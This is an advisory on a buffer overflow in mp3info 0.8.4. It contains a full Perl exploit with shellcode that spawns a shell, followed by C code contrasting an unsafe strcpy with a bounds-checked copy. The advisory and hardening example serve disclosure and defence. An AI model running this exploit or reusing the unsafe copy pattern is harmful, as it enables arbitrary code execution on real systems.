mp3info Buffer Overflow

Summary

MP3Info is a little utility used to read and modify the ID3 tags of MP3 files.

Improper handling of user input allows attackers to execute arbitrary code using mp3info.

Credit:

The information has been provided by Kamil Sienicki.


Details

Vulnerable Systems:
 * mp3info version 0.8.4

Exploit:
#!/usr/bin/perl
# mp3info Buffer Overflow Exploit
#                       by Kamil 'K3' Sienicki
# just for fun ;)

$shellcode = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89".
             "\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c".
             "\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff".
             "\xff\xff/bin/sh";

$len = 413;
$ret = 0xbffff660;
$nop = "\x90";
$offset = 465;

if (@ARGV == 1) {
        $offset = $ARGV[0];
}

for ($i = 0; $i < ($len - length($shellcode) - 100); $i++) {
        $buffer .= $nop;
}

$buffer .= $shellcode;

print("Address: 0x", sprintf("%lx", ($ret + $offset)), "\n");

$new_ret = pack("l", ($ret + $offset));

for ($i += length($shellcode); $i < $len; $i += 4) {
        $buffer .= $new_ret;
}

exec("/usr/bin/mp3info", $buffer);

#EoF
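
The exploit above hands mp3info a single 413-byte command-line argument ($len = 413). The C code below is an added example, not code from mp3info or from the original advisory: it contrasts an unchecked copy of such an argument into a fixed buffer with a checked copy that rejects oversized input. The struct, the function names and the 256-byte capacity are assumptions made for illustration.

```c
#include <stddef.h>
#include <string.h>

#define NAME_CAP 256  /* assumed capacity; not taken from mp3info's source */

struct track {
    char name[NAME_CAP];
};

/* Unsafe pattern (hypothetical): copies until the NUL byte and ignores
 * NAME_CAP, so a longer argument writes past the end of t->name. */
void set_name_unchecked(struct track *t, const char *arg)
{
    strcpy(t->name, arg);
}

/* Hardened form: measure first, then reject instead of truncating.
 * Returns 0 on success, -1 if arg is NULL or does not fit with its NUL. */
int set_name_checked(struct track *t, const char *arg)
{
    const char *end;
    size_t n;

    if (t == NULL || arg == NULL)
        return -1;
    end = memchr(arg, '\0', NAME_CAP);  /* look at NAME_CAP bytes at most */
    if (end == NULL)                    /* no terminator within capacity */
        return -1;
    n = (size_t)(end - arg);
    memcpy(t->name, arg, n);
    t->name[n] = '\0';
    return 0;
}

/* Constructed input: 413 filler bytes, the length the exploit builds. */
int demo_long_argument(void)
{
    char arg[414];
    struct track t;

    memset(arg, 'A', 413);
    arg[413] = '\0';
    memset(&t, 0, sizeof t);
    return set_name_checked(&t, arg);   /* rejected, t.name untouched */
}
```

Rejecting the argument rather than silently truncating it keeps the tool from operating on a different file name than the one the user supplied.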
